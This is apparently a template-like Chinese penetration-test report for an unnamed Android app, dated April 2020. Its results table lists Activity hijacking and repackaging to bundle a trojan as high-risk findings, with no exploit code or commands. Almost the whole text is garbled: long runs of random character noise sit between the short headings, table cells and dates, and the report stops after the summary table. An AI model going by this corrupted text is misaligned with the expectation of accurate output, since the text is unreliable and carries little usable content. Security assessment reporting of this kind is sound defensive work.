6 i' c% [( [' I2 t; i6 C, X' k
/ I4 h" k1 U; _2 |
8 Q6 b v/ f! G7 j1 }8 _* w
3 Q/ H9 L( U, |# w5 T
& }- U5 X. k# p) W/ O7 y( N
- |' I- A+ ~9 C/ W
- F' X/ E( I5 P$ \; b6 b# M: Q/ a( c4 ]# p' V
?( o# L/ w) ^, ?
, E7 o+ C' t+ b/ C1 i$ X $ i" A$ ?/ n( s" D, c5 _
* a& b% F) P8 [- B [3 k8 ~ 文档编号:
: b" [9 s/ d4 p F c- J& X
$ C- g+ }' c2 L- T% \) a, U
) Y! @8 }" ^, V8 t7 v
8 ]2 F6 [7 m$ _% y
$ o9 `1 `0 O' d& R
9 `* f, {: L$ N- p4 l- \% p/ | 5 E. i6 T$ {5 A- D: C3 R
) |/ h2 K" I# z U: P o2 I/ C' ]
3 P) ^& t3 v1 r# R1 H7 |
' o+ v3 Q! ]! ~$ J5 p) n # \, ]5 X" u: H
}5 R! `. a: f; p
& A# ?8 S0 q0 ~3 [8 ~6 [/ H( T9 [5 r8 h7 Y5 q3 D
4 P# w$ ~7 t. i( S& J6 d5 X1 C) g: E7 M* v5 [ L B; @, A2 g& ?
' S$ \ S4 D. T4 {
0 I- l5 w+ u o0 n0 T # E: @+ }2 ^: i6 |1 i+ s
' X+ G! q, j% s5 x. N: j
f9 Z4 d$ z" X7 m% }1 l! U$ U9 c7 t: I$ G' I% @- ~. I* K4 i
1 W0 B$ y) D6 e3 l" J) S" K
$ G/ p6 K/ h8 @7 I# R & x; [& x9 ]5 N) m @
9 h+ G z, Z- M1 i9 ?8 A
9 y( e7 U" D- [+ S" [; _2 g/ T3 b4 [; r% X$ x6 u
) ^" @8 v" n3 f8 A! O
3 y+ X4 m6 ]8 Q7 `, l n# v+ x' p
9 c7 p2 h l4 s3 A9 U" A
" r4 M: ^9 `' i# [ F( X; t
3 s. O0 H# C% S/ ]' H
6 c2 K5 i- q8 T- a
4 g y2 F* {& p+ \, K
$ [9 K' j! Z" e- E; t 某某某APP渗透测试
, Y2 F4 }( ~& v/ R: w
6 Y$ g% l/ j. ~$ C& A: k9 N9 u
; M" }" S# o7 D
: U! a' |1 h# n! M$ m4 W
( d5 ]% g+ K' v1 a1 ]2 L) ?8 [7 _ R; G
2 Q; Q# I* j! e% g4 K) s4 F. }6 e3 W
7 q4 I# j$ q4 L; b; E
: i: j7 @8 b% J% r* a
$ b7 z8 [; \2 B5 n# r1 v" p
, z! l) W5 H# p s* p1 @$ o5 M
A- _+ l+ h) [6 m- y! q. S
# d! {% G. \, p$ f8 }. j' p1 X
) l( P# R1 G* y Q8 p
- o! m9 ^$ e# @
/ P5 l7 C9 n' C5 {0 S! I ' Z) a" p' C, ]( F0 |9 f0 y
D4 Q8 q( o) y3 C v) e4 c , R- U* d7 x- E1 P5 k
$ V! k$ `) [+ {6 N4 R% K
1 x( k* C8 Q" d4 h3 {& w" r3 t: d
# u) D# S g7 j
2 H) z# f& N5 p, v; k
8 k3 U1 k" F8 |, F$ Z4 @ 9 k0 Z+ A! W) O5 v6 O8 N: _
, n+ B" u; ^$ h& U
, y% f$ Y) x/ s" B3 y: f/ r
/ I8 P+ G+ q* q: H0 d
: b% ]4 ^& L6 x- G7 N7 _7 f
: P: f/ P3 s2 K+ U# V7 C 技 术 报 告 $ E( }, I2 v% \$ S+ J$ |" q
. ]2 v/ i% h" @8 @$ Z6 {% L
: A$ c4 c# X. b& W1 `7 M; t6 K; e3 w; p! b1 v+ B: O
& t0 S" q/ i2 {' C# |# P! Y; I! w4 I* u
3 W, ?; D7 Z. l: s. K6 ]
, s$ X6 |" b& q" P" e- c2 X
6 L4 G3 G7 b/ |8 u7 \$ t
5 H/ k2 T, D* K* g ' @5 L/ h: W8 c8 r% v
6 q# _7 j6 |5 z9 n, T5 {
4 k b4 F. [* J+ D9 a
: h- x% B- S: u3 J8 K- W
1 l! V# `& a5 X; g% S! l" B$ O" A; T! q8 R8 B6 J4 [8 @5 A
+ h+ z. p- U& s1 Q0 j
+ N1 i# z8 W- D9 ?) T- d% B t7 {6 X( G2 r7 q
% y# s+ o% L4 e% \# t* Q; _
/ B9 M* C+ m5 N9 d: G9 k+ @1 p% L# g5 _* N" N
( b& m2 H* ]+ t2 m' O) v
1 s) v) _; y* G3 z
% [7 @) ]5 z* ?7 g5 a& K+ H( n- p9 ]7 k0 Y1 g; ~& o1 o K
" G$ c( j1 \# ?, F/ [; Y$ e" R5 ^4 ?
1 z0 o$ h) w! n; O3 E
3 V: T1 t& P9 g! z; k5 K+ v
# }! e5 B5 T7 O6 S
6 D j* a) _6 K' _: g7 i: Q
/ |1 [2 u# g$ V- ?7 ?: S. x5 {
% w; S0 b1 f, \. `$ C( Q' s' {& F
" z3 _( @' A. s7 z# s. }
z. y T& S3 V! ~' @0 \" q
|: o" C8 a3 e0 ?( R w3 P, B4 L/ T1 P, O" a
& {% U' z. B1 r) `0 L' K
/ Y. d. U+ v5 w F3 s
& n/ v" C! }- D t `) E' h; C- q" x) w" p/ r
* o, B$ S7 l5 o. \' A2 P
: q. J0 H5 h# E5 O5 D
) s6 k" V! e: v7 m5 r7 F, A$ O/ E" T: d+ _! \7 ]
; c0 z; l: ?! t" t# H
2 j/ `# S7 |) U. W3 u$ c6 i . |4 X/ ^( q: ~- g# o. C2 Q
- H. a$ o# P. n+ \
; ^ H, C& H' K! f! n& i
+ `8 O) c4 Y; A! s " r" d7 Q* J. b: {+ f7 Q* z
% x- e! W! R" X5 F5 F! v/ v! w3 @3 Z # u5 q1 d: z( p+ H1 C: {
% `0 n9 ]' T! z. l+ U( g. J
3 p" h4 A0 o2 t5 B+ L4 F% y* U( H7 `
( y- r/ U B$ o3 G! w% X
5 l8 l" E( q( j) i+ M $ c# ?5 n% s) I8 i* b0 e
: f( q% J/ j2 O9 `) e+ G; f
& G7 S, ?! R! P
# V: s8 u, [' F) l) ^ _$ Q$ M1 h Z. B9 |1 |0 v9 o, O
2 w8 d' T* F1 K3 a+ C x/ q) } * |; @$ _/ P8 d) P' S9 h9 X0 ]7 ^
( _+ Q T5 u6 _
0 J1 ]( x# B: k1 T- f( c7 n: v6 K
# \5 o; D* r' b: |" [& ~5 u: ~
6 \' X+ r: q- I" E8 A; ~( Y. g* [1 u0 ?. V
' y' R/ M+ z& n/ `0 w( F4 U1 i2 d6 M" W) ]! I; B- r3 |
$ `& k+ e$ u5 u0 P! T$ a
/ d8 I; ?4 ~ J, X; E 1 s2 `9 V0 ?+ f7 J5 d
3 ^$ L; [" K* B c# e ) Q+ a Q6 u4 _
% x% L3 h$ A6 B+ I' U$ K
' p2 p* X' F" H4 w/ l
( Q8 I! o5 u2 B$ [+ F2 l 4 _4 a# p3 Y2 k
, A3 V( @; |! Q
2 \4 W5 a1 M0 C- h r9 x' f
# U7 `6 V+ s7 E ~ p
0 w, q5 N# W# I- h/ \
- f' N* P! V1 S0 @ Y; @3 @' k8 ]3 D! m
! g# w- A) D! i' y0 j8 ]
^, S+ T$ \/ D
/ c0 L: {0 X1 n1 X/ P
; _: M, ?. _: I5 S; a( R0 T2 ?1 r; \6 _/ l8 j7 j/ G8 X, l8 y3 M2 {
" V8 z j& k# z
9 g) j9 s0 e2 d6 ^$ X 3 n6 c2 m' z; |- a
4 J% p, U9 W3 h, ?4 f& A) |
. z0 y/ a$ T" C. o$ u' K
2 f* g; w+ M7 E $ V& B8 ^) a! X: M
; [- r0 g- s B: S% c6 D& L . G7 s. n( p( K/ Z7 A0 X
: N- |! k E' l
8 M1 a, ?4 r; H! F1 y( A4 q1 c+ _% [' Y. z$ _8 x$ c% }
2 h- p B# y0 n- \: Y
5 X, z! o# h) w+ l. C
( o- W: G3 j6 x% Y7 K5 h$ L, f
Y+ T! ~- X. E# l
' v2 W" _2 _2 R" Z9 F+ j$ j/ L& i7 Y: Z6 y Q, V- \8 m
# J" L* {, n& S3 w6 O3 g1 }) w O
: b2 j- l2 P5 i% k
二〇二〇年
1 q! A ~9 K! i( W5 r, o; K
! t7 }4 P: ]2 x, o* w
% f+ i# R: X; ~! X* D6 ~
- {! b2 J5 a# G' V% n( I3 B+ x
: N3 D+ D7 |7 p/ @! Q, ^" r0 t4 w, w. o( N4 x9 w) @
; } O' _- V! Q% b$ \7 A, \ ]$ L
: i5 k( g, d+ h6 X' ]: ?, p4 N- y
/ x2 Y5 H, T& b) E1 O/ a8 u R, D
% u+ S" v5 H' Z) {. F& m7 O& q
* {0 \1 A$ u, a( d7 r
4 w: A) p& p! w C5 e: T
: M5 H$ B5 D$ g# U ]5 M0 M3 I7 e9 m4 P* M: p& J( o$ ?
, T/ f9 M" ~; V# v2 B$ {( E" y+ \! n B) j$ k: a/ M% w
, J2 V, h# u" I2 _
( T# ]. b9 B$ G0 @; B$ o. a
" T. {8 W( C8 f9 s7 _: D/ P! d! M) L. g3 @! {1 Z; v! n
" g( O0 Q* v0 N A4 T- y% g0 B% p, s/ r2 }/ K) a7 j
目 录 ' u" \2 r' v! g) @) n$ k. G x& Q
0 Y% ^$ t4 j0 n; U
) h; |% _5 @# U$ H! l. U0 f0 {; ]
0 f3 Z* c1 p2 h& q# W9 n/ K
b4 F. T' z/ q" K5 z& V5 H& Q
0 h$ z& y9 @3 E
1 i: I/ ~$ Y& q# Q8 r' V x
7 W& k2 j0 z# A6 L; A $ A! C: r: s5 @2 @
; k% A/ I9 b2 i b( W4 h
7 W' {- C0 _! ]8 X- P7 y8 |3 T: c E. E( q: I
( j6 k/ `" z# O; u& Y" y* R- p
' u' F+ C8 L/ T' U- M* h/ e 1 概述... 3
& b' n) O: w+ [8 ]/ j! \0 h( r* z( P3 p; O, {
6 ~7 m7 c5 C0 b" E3 J/ l, F3 O! I
8 M9 c& s7 S8 C0 Y7 S& F
. H/ ]8 ~8 u. h
( w9 c# T' M, ]( w3 C* A! f
1.2测试时间... 3
$ n/ H6 e; T. p$ P1 N7 L J; J: i1 _# X }$ Y$ o/ G
+ j" a0 e6 p) \1 r8 }
9 K$ \, `. `! G
( d+ U' H3 ~# K3 Z* T3 F
/ S0 f3 [; d* {' ]: v' q9 w, Q 1.3测试对象... 3
3 n) h/ I" F6 E: S- M) [
8 E: Y0 R! `4 U H
2 a" a3 e3 P( T! V! v7 [
4 g% I! Y( g; r
' f# Q( {6 [' _: o
" k# F1 h& R1 V$ e& l8 w; d 1.4测试结果... 3
x9 Y6 S) C5 V5 ?6 m0 T* P4 W4 ^
, ]1 q9 ]' U) F7 }* h/ {1 {
% S* Z. |$ L) C" ]: T# L
& V2 F; }( q% _/ q$ s: m
- D* J3 C+ u+ F3 l4 A9 g$ f4 V1 ^1 H4 W; Q) D
2 检测结果... 4
0 } A8 Z! y* m m0 n$ W$ c1 f& }$ u
8 P2 E X- G7 ?9 f0 U' F
0 B5 V; G i3 f U
1 P8 X4 d& v; R" L( q5 ]# \" K
7 k! a! S9 L6 K& [4 Q9 N# J 2.1 某某某... 4 . }" z" P& b' x' M1 {. h3 @; }* B
t* {. z7 n3 N: e8 R- T
% _3 W( {) ~* W& @. u7 q) E4 W Z4 S y& o3 K$ v# \
- v( k5 G+ n1 a" B
3 D/ ^ ?0 U+ @7 H! M' M& A
2.1.1检测目标... 4
( S' S! Y1 M: M; K/ K1 }$ d7 y0 b$ z2 D/ {/ l. U+ u
; z' y& S, V5 N. n1 L& E0 B( a
: Y" O+ I3 m! x z" I V% ] $ ~+ Q6 t6 ~9 k. q I. s
5 I1 d8 f- U. ~9 Q* e 2.1.2检测结果... 4
7 i8 t; q7 Y& E
( h1 z# }$ n% x6 B" t7 D( y% Q
- ^" b# R. c* _- K- w1 l( k
) m% R: T0 B: r/ L2 b) ?
+ a. R# [0 ^+ ]* C% _3 {7 Q* t: i4 G; b2 d8 ]
2.1.2.1. 4
T$ } w! ]2 U0 |3 b: i/ O9 l2 y/ }8 L& z, {4 W# R2 Z/ p
: n V J9 j' K' _* [4 T: B; a1 h" o3 S6 d2 @$ H
) y) W5 _2 C( h' P/ k. e, D+ z& e! c# b8 l6 h9 q
2.1.2.2. 6
& c! z6 H" e% z. u2 D! l i5 [2 r
- k" b$ Y4 N/ h2 b- z- o' y% z
; h( f5 `7 o8 F
% b" X, |( ~9 J 6 V9 [8 c# R8 ]9 \( k
- q% t1 c: A3 F
4 Y4 [( T, p6 Z6 ^" ^ E$ D
8 d; \ J- K2 r+ s
, ?5 M6 z+ b$ z$ g
3 \" L: G: e( Z* ^
5 i) A9 f7 g; o9 B) z3 }) Z( I2 W- Q+ }6 x& C
6 L5 b, u% r9 ^3 e% w( }9 W( W" [5 T
% W5 @) G z! q3 p( g6 s! k% n( \- o/ x2 Q5 S, H
4 r* V5 W' a) ~$ v5 Y- ?6 B, M7 I" B8 n2 H
# h) W0 v* u* Q" F8 J( ^- Y; d% P' ^
- Z6 g' t. E+ k2 \9 I, x- o4 r 1 概述
, D6 m x! K) F/ m/ A, @4 q& F
; s, k9 T' F1 E7 d$ X0 R/ e. P$ o8 J
2 n3 u, Z$ i7 u2 r, ~
* x; `1 ^, [* q6 D" t0 l 7 e8 i/ O7 n- H% o/ X7 Z1 O) b
; K& ?& w5 ?+ r8 s- p: b
1.2测试时间 , E( \7 P) i& `5 k$ V2 Y+ a& a
: C# {6 ^4 m+ _; l: n+ y0 V9 H* s6 m) `
" L0 N8 F: I, l2 C6 S
# K/ U4 ?, i- \7 l/ k
$ w; H7 R0 W& S" p; a3 m8 H
4 r2 o% d# J7 r2 u9 q $ q$ F+ `6 t9 z: \: n3 J
" {1 Y+ O4 t" j0 R; l& a ; k; _& M9 b! Z9 S% m
# D+ a# o8 R# a1 N
/ H5 T( W0 k! y9 s. x
9 j0 W+ I2 C2 Z $ x; x' I) b: d$ `8 A
+ N( ~$ B) f- M- \/ @8 G; f
渗透测试时间
1 f S% N- F) w% @+ v3 ^
B6 N. F2 V' B0 @) B
( {+ `- h, Y$ P: b- D: I5 @$ l4 X: h/ ~- O( B% Y
|
8 d- O4 }( e! P8 ~8 r" ^8 _9 s4 c$ e
- M& S9 g$ }" M( Z
5 Z0 I) j- y4 r) G
& ?) ~% C" x$ U+ q* e/ l
/ O4 Y/ a/ w) o B5 n% K0 R
4 b c& F, Q/ X% M; N2 Q. i5 B# P: f2 c/ n- A- U3 y7 F. x- V( o
# H* K4 F; S" k/ S9 ~( R; d
8 E0 i" p7 C0 F3 ` 起始时间
! q/ |5 ]* a B
, d2 m9 }/ p% |$ b3 s/ S7 C ^; V
: @5 e# J$ K! W _. ^ ]9 G5 z. T$ c& y
| * o, B8 ?4 `: `& L3 \
" d5 Z) k' Z2 Q! D: A0 g - m# F4 g# q) y U
8 A# V1 L9 v1 K% N6 D. U' M) i
) |+ ~* f0 J8 ?9 x8 Y
2 Q% M. j% s. N7 Y
2020年4月6日 3 q) V0 @0 K* W# }* Y7 J0 A
& q! a% r% E- m# O* D: S* A: N u
+ D0 t4 Z1 d2 \4 v- e5 z
o" | h( J5 V& |6 Q% O |
$ @% C& L, n5 z0 e, W3 E M8 ^0 s
" c8 h: b5 @1 D6 N9 F8 f4 Q
* h0 _8 p0 P1 Z K; Y9 h# ^
0 m1 |9 f; y9 C1 H 9 ?& ?4 g5 W1 s* i/ y: b
6 x4 Z* b: M [$ E9 [0 P* S7 k 9 s) k# _3 E% H# ]
$ x/ x! N# {7 p( X2 Q3 [9 O
, x) Z& z# e4 x4 x4 G0 s+ K
* K4 y- v5 u/ q! B n# e 结束时间
9 ?4 G# ^- a6 N- ?# K
' q9 b$ j4 M% B* F/ q
5 W! y* m. C! h* q4 B+ {
+ I* i$ P- m6 r* O+ n | 9 j& l" k, a$ x0 v. [
: \9 D5 H: e5 q6 R
8 I5 P8 K4 C: z$ e9 i# w
" [, |- ]9 Y- ~& ?# R% z& J# t ! f" m( z# e, z5 A$ A- a5 H
' _7 K, @. }! j 2020年4月9日 8 k* I% I9 H2 _2 D- U
' _: t" _" z9 V& [4 o
" q& B5 ?) ^ V7 Y$ s' J- ?! g& J9 J7 G! K5 `7 X; R1 @7 p
| 8 X+ a6 s. w0 J* y# s$ P& S
" M y# T9 i9 }. W9 e
" a) [5 I; y" L& X- @6 i2 I, S; T/ b2 U" Z* K( s# U/ b2 R7 j" J$ o
! V( x$ h& v) _9 g) f7 Z1 p/ Q
1 m" N8 O/ [6 G8 r, Y9 w/ H
% o7 [: C2 @, _0 V
5 E5 V/ T; _- d- M! F ( \% ?. G. N0 c; I. u3 J
1 [/ H. _) N+ Z& x 1.3测试对象 8 z' \( D7 N2 g; S
+ C. W, j3 Y4 z+ ?
0 q2 g0 i$ N/ z& R1 Z" Z/ Q ^4 }
& ^3 _) y% N( C' S6 u: q
! x% _1 J9 T& c" V' ^" f6 C5 |9 r9 q 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
/ @ S% o! o: r+ j* f( v
# o0 Z$ X! ~, b; g" \5 g* z5 g
( f! a) d: U- ~- j; p- D6 s
# T) p. q. n6 |6 ]
0 \- B8 y/ h8 W! B2 t) b" q
: s4 g* i3 Q H/ `4 _- k. X+ @" T
表1-1 检测对象
, T: J! h7 c% |+ s; @3 b: w+ \0 L0 H
7 X/ e) }# f9 d A& M
+ l7 e9 d, J9 @
+ D8 H4 W( _7 C1 R6 P
$ m4 n9 j7 @# Q% v" v
: z! W% ^% l2 S+ m4 p' ], V2 x0 P$ z }, L4 j( x5 @
. y6 t; ~1 H% B8 u! E, U6 b$ K0 p4 X: N5 ~' {6 q5 L) P7 ~
5 ~4 {- O/ p* a1 m7 H" e9 S0 Q/ d
0 n6 ]- P* C1 M& ]( P0 ]2 Z0 R2 A0 [, g1 U
序号
2 Y E2 Z# x9 f. A+ g! H& q" I
4 l4 i7 I5 ~1 M0 q
) N# n. c' r) [, _. H6 f0 c7 v, e1 ^& W/ c6 Q
|
, J5 A2 {3 \ _$ H) i' ?' w, ]
# g& o% N/ f0 f! X! E" h: s. f$ X
) H5 n( Z# y1 }7 R/ P* v3 p: F9 M: p$ a; h5 r
9 | y& e/ ?! s8 R8 ]
. _. P6 p+ V4 d1 p& y 测试对象
D! P' M( W$ { Y% a! C5 L$ y, U+ c1 L( g( C( A& a7 }
7 O3 c+ r% ?/ ^& j% `
" ?. j( W+ D7 p$ X. m1 R2 b | % c3 P( ^2 j4 c/ c! ^$ I- \
* N5 g5 m# u% ~9 Z3 v9 a
, l6 I3 C- m. q1 r* L' D- D8 N
5 L1 c2 N# l$ r8 K, Q2 z ; s" b$ f1 |1 p( K6 _# n5 |
4 [# U+ H, [( t0 s7 V5 F
测试地址 & X( w1 Q D" y, G2 D0 w6 F
9 o0 h$ \ _% O, ]7 {3 W& n4 r
. K( ~4 l( y) z i2 k( ?
' b1 ?" O% z L+ }! i
| . S+ |. `) r" `4 P6 D. l
' T4 P5 z" R3 K* J# b; F! [. {
; L6 u; ^$ f/ M: C1 Q" |' [* `# v
" ?5 x8 m+ u0 Q5 o; o
; ^3 K% T, P3 r9 c; O9 C+ u( y) E+ [
; ~9 _- Z4 l! r; y7 C 安全漏洞
4 b0 t5 ~; \3 Y* r2 s3 K7 b
, ]6 X$ [6 A' ~) _* Y* ?" G : T0 Z7 \ C; t+ t( g, ^7 T5 G
% r. X% l! e1 d8 a' m2 c
|
. ?, u. \( x' x. [2 b
' y8 q" E' i. |5 A
* F9 `' J* ~+ ^' h
b, d, L, x0 |% b( R2 T
& s& I# l5 {& K. q( {: j2 s9 s, P- j) m* S( q4 L' v
: `, [. [$ B/ k! C
1 Y1 t I l; L* X, |' s5 H9 p5 D ' Q- @' p# r+ J$ O, m0 d
* h7 I( c9 h' `4 a0 Z$ B 1 " E" @& y8 n" R1 n3 f- ], ^
X. e: {( Y1 W2 y
e+ {- w- b0 m' M S7 c9 B* h4 k5 p( J" }) ]) ?# P3 p
|
3 H ~4 @% L- m2 w
# t2 g# O5 S' {5 h
# ?# Y& d7 c7 @6 j# Z& g1 A5 A, j( s$ \+ e9 n9 e. c8 N
: q2 o! b- Q: s& m2 ]8 i
; S$ n: O! g: a0 Z2 P
某某某安卓APP
3 j: w# |" | m
{4 I' ?; v& g# d' J; e) n ' _( i: c4 [. H3 r7 Q# x+ z3 l) P
% j3 u3 \) W% V |
. f0 K/ g1 B7 _: K/ H4 q% M6 x4 g; I& |, J' H3 m7 C: `
& |- Q5 k n, ^$ E
3 W+ N4 V1 R. y. z; ~+ v: l
" k4 O( T" G: T8 C5 V( Y# b# X( D
: D0 n5 J( |) ~2 Y% y) ?+ v% ~
, m2 r' {8 h; W/ t3 Y$ A8 D7 S. \6 G$ |% d4 r' [5 a
# t, C! q# {2 p0 G+ ~$ ~) ~+ d; ?8 X8 x9 M C6 ~7 ]
|
2 ]# O) _! k o* O3 g, w% M$ B
8 B# a& O. d1 E7 G P9 P6 J
% X- q' m, }) g! Q4 N! `3 m' C* K7 I; N, T) `+ K
3 P0 R- B4 P6 K$ y/ X$ T g% S
1 T5 G5 t/ i% X1 N4 L' U 2
- O( n& o! F% t& F( n/ ]; N3 M5 n9 d/ O; p
! N: D; C. [, b* P8 W
7 I' E8 e5 [! b: I9 h6 R! Q8 w# ^
|
6 I8 _0 m0 V3 Q- t1 O. r- l6 `) B) T6 C' x3 D8 ]1 F
C ^3 @2 M& \$ W1 s% s" e$ {. \
! h9 G# m" v3 Q4 K/ i! v9 O
( N/ g# o4 ^2 r( M6 r) S2 b0 z( e) ]
& K1 e2 w4 x! U) W
) d" f9 e2 ^3 S3 E) B1 c; K0 _ + R) ~6 J) ?. S5 P2 N/ u# l
: e7 M' z1 x# o! X
1.4测试结果
0 k8 Q4 a2 b1 X3 L6 `! h
! x7 F$ W! J9 m2 a
/ t6 v+ X& K% U& Y: e/ K* }. V9 ?" c( B
( u& |* f4 o- @, w9 Q
, D, Z# A# S- c' ]6 h
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # @5 j& O) [! i" b) M, z
* q! F. [" |& l* J7 X( B! Z! ?
8 e. l' N2 U/ P- L& j. [
* {; |! |" Q, q P2 f& V
1 B( \7 E3 Y) a: O
% j2 X7 f/ c# j. c M8 C& m
3 R& w6 X# ]! W' v( g9 U$ X9 I* c
1 S. I( w" t' ~% [2 _
% \2 ]1 O/ A2 y! ^# g0 x+ T7 D* ?" p3 o* Q3 \
- A9 F4 K7 b4 \/ M* I6 ~6 N5 B" t
9 o% ~8 F: r* u6 G# H4 U- e
9 ^9 w+ F; e n
$ A! B2 U, S3 j: A; H/ G
( \( ]7 A$ O% }
, _ y0 x2 y# `, d 4 d: Z; i+ b* F* Q- i
( l# {4 O, t( C' e S2 H i
& m6 L- P3 n" _3 ~- t- \5 S1 r! @& F
8 p& E& V6 V' N! z& B# `
$ ?/ y1 b* j2 @; {7 ]0 x) U7 X; B9 X n( D
序号 ) V5 R+ l2 Z" E9 E1 F1 D. i m
( |7 Z% ~, w4 q
/ q4 v, R q' Q2 N, n B+ H" j% k( R+ {
|
. p5 i; X8 r2 W) S1 a7 R
) T. H& t/ x# `3 ]3 H' I5 ^: g . K( V' i/ r5 n3 R m
8 I/ q. w" F4 ^1 ` + m! D x' D9 o7 n
( _0 q; T- R8 K$ h
系统名称 - l3 f0 Y, ]4 i' O% S5 I
# i9 L/ y6 q; P4 F7 y
7 Y$ F' E+ j% ^3 x2 w& z' `* p
5 f w% k; H) d0 b9 y1 T. M+ E |
' \- }) ]0 {5 E. v7 T4 ?9 K" ]8 r% G
; X3 f7 I" {1 Q* M
8 U2 s8 _& M0 s$ I% R
" u; }. K% ~3 |2 s8 `1 g0 p; v0 A- E7 K& d# p
漏洞名称 2 `( B% R" `; G7 X; |
* Z) ]+ _5 {- P Z4 {! [) N
1 T# S# x+ _1 b6 W: i, m, ~" N# j5 {* G& A G; A7 X
|
( a; V, f$ }4 X! m4 R5 C" L- q
; i0 A" R1 T/ f% U; w
# i( Y, P% Q% b) q$ ~( v/ E8 M B9 Z( t2 \- M7 g- H5 J! b
9 [4 D) [8 D5 k' [: [
3 s: H. \4 W$ J1 p9 ~" n# S+ L 漏洞危害 ) W) Z+ v* _& Y/ Z& h E/ N
" v& d- ] j; l% C* I
1 b9 H2 M7 u( T, u
3 j" ~9 @+ r7 W' ]& Q8 f& Y+ H4 m
|
- ^! e* E6 v, |% e, a/ `' ]1 W6 k9 ^; U( I1 \2 j( u
9 n7 a" o7 H0 {2 P. [
4 v' Q+ ]4 G0 N8 ^. c( G. u2 x
6 l# m# a, I( [1 F4 u
* w3 L& \2 }& o6 \0 F" \. M! m* k) X 修复结果
% e( C7 c( _7 p3 `1 S: U {+ I0 {$ w2 T% T, x5 a
. Q9 M) H, m% h: [4 w1 ?3 m
' D( j2 j0 \% }% ^+ ` |
( V: y+ k( \, y" `) u2 ~- K# l/ S; A8 l D3 R; V g# h
+ d" u8 D1 R1 F, Z: h! x
2 K2 i& @9 X8 G( D0 D ! U z8 d5 u' C4 i; ]9 X/ I
* e( `% E! r- ^8 I O6 V . _; s# ?7 ]$ t j
3 d/ V1 }) d/ P" z) f6 _: l
1 O/ G9 u. z9 |+ y0 j( E4 t
) P3 K! u' q1 n( J! F: n6 D2 S 1
& T) N; {9 h0 p# I
1 w, f! o) H6 E( z' ] . l; O* |3 ?' D" P s
8 Y" S2 T1 I. \& w" I: N | 1 q+ f, j$ [' @% E' x
9 c( ^3 [! D* U0 |2 y+ n 8 ~( y" v7 W. j. w! c% U$ s* {: D* {
4 ^0 ]- a* ?+ `" C. l
4 @* u. r. M3 L" s
" m1 A& L. ^4 S+ @ 某某某某某某APP
9 H" G. J9 z" C$ i8 z, ]9 a8 H0 }
$ U! c* v9 }. A4 C8 ?! @
6 y5 y; r1 O7 Q( \& Q' I+ ]4 U+ O |
; \& p% k" u4 v m& r5 C5 n+ Y; C" L3 r( _! w2 }
3 J7 \1 m+ V! A; H- O! V# Y5 y
& M4 \& b+ [0 y! |4 ^, N8 L
1 `# H* i. i& Z. A J9 ^. s
. o( f2 H4 l) b4 j5 N) ^ Activity 劫持 + l" M. ~! D2 j6 s6 }; G
# h; C' c7 O" x+ Q; Q
0 S+ B- \" n/ [( q" N
, R1 w+ Y+ N; @: i3 I
. l7 h% D( Y7 z' q- R1 O6 A4 I
* n; l# q }, _. ^2 W5 J0 n ; g; Q, J$ r6 e3 `) G
& R5 Z" I' ~5 l! T6 t. [ : W7 [. F: x# F) Y) ?
5 h- n! d5 L9 Q9 s- g, i1 I( c5 y |
; L4 [+ ^ k( o) k; u6 U
, u( ?5 g8 ^: M: N( G, K2 n# j3 s
9 R/ { m5 \" g& F e& N; k6 D# [7 {3 o5 y* m' j. A; U
. l [& ]9 X9 G
: B4 m+ m( J6 n" N& H" F
高 + ^' r8 x6 V7 d2 E: P3 x; H
z: l6 M8 ^5 j7 ~! W& D" b/ j ! ]0 s, Y/ N+ I+ p1 }
6 Y5 g# p+ T. t" S
|
$ z. R9 ^- w9 v# C& V$ `) U4 C. n
0 s- C2 Q0 I- S- @4 L
: I2 E1 ^/ F) z7 k9 U# b; W/ x5 [5 A5 O3 u5 Q) B. }; N
- b5 C& C, l6 R+ K8 t
( p5 {# @6 n0 k$ a* h" G
- \* U/ b, P7 R) t. C, _4 u( ~9 z: ?3 \! U
% j' @' ?* [& V
. O% O" A) ~& m+ K! l8 ] |
' C: B4 ?) p3 W8 ^0 y0 R
- M* \: d, A! ^
# l3 q/ U$ l' `# D
9 A$ \ G ?. j' _: m. E1 K8 g
8 K2 F# V3 e% R; o9 I! v) O
1 {8 P- \* I. G' K5 e8 U: @$ V
3 k: \" b8 K0 r' n& w/ K% I
1 S7 W' o9 e( y
# e* S+ C" F5 T6 |' k
3 k2 B0 U$ ]0 `& j 2
# c2 s# v3 A6 u! S& Z& c
# ~! a" g& ?; [8 k) U9 N4 ]# e
+ O e: e, |# H+ Z; F- q
2 e9 W# B( z- S. K | ( l! Y" E: ]8 Q4 x( T5 p9 K
: v0 m/ F/ C$ R- K8 u* _
- h- V9 A6 m* L: t1 N0 q( [: y& [
" \4 [" M* {" ]% W5 R4 \
1 [* x* Y6 n1 _9 f" z$ e5 D9 q/ _
' X, b! q$ g1 p) N4 C* e
某某某某某某APP {1 `8 y; N" J. a! h; Z
2 K) d4 |2 U9 o/ Y
! _3 }8 a; [- t; f- {, W4 i1 g2 t* ] `5 W6 W- E: I
|
' c( l! ~' `' k y+ M
* c! y7 y" A! _. s9 U 4 f- z* M* ?/ Y- b9 [3 p: W& ]
/ a! f8 N# Q% M% D0 h 4 ?: g- f# q- A6 R- c, {
7 a6 Y/ i- \$ r" ^. M 反编译二次打包捆绑木马、篡改APP代码 8 m9 U3 d( ~) p$ j, W9 j$ V
& j$ W* S1 H3 M, A3 i+ B z
+ g% c! k( A7 Q% _; t9 I
0 q; D# H- E4 {7 `. d2 K | % a" v: f. ]3 C% I* Z) K
+ T: ?) | t A' L5 [
) r( O J' V3 e0 A( {- l
* o4 H* q" N! g& p ) M: O) q ]' v" k7 s
3 B; J" k+ }8 `/ @; p6 b( h
高 - ~- Z+ ?% b+ {
8 ?6 Z8 i. M# b1 N. M; J; F
8 A1 L& f: T+ X3 m' l) b" V2 T6 O
; B' Q( Q j/ T1 p
| $ R+ w8 E1 C4 ]( K
: r2 w; ~ E' j- E3 W
$ o6 S5 _5 o4 c" E \" o$ g/ n( E D
& ^7 Y( {9 a0 T) {+ S# Q7 }) W- w N
( o0 }; u* f- Z# M8 b - t; U U4 h8 r8 _/ X5 k2 v
B4 W, B2 T! h
7 W1 S+ U; B1 G1 a% J
/ S2 D8 m. M! M& y6 s( z |
- P8 G$ X! T" d8 y" N6 ]/ L h* H1 u, C' X `- b. y' o) b
0 v# d/ g. W* b- f+ }# S( o T% ^4 R7 x3 t
8 K, B$ Q; s) V* P) r
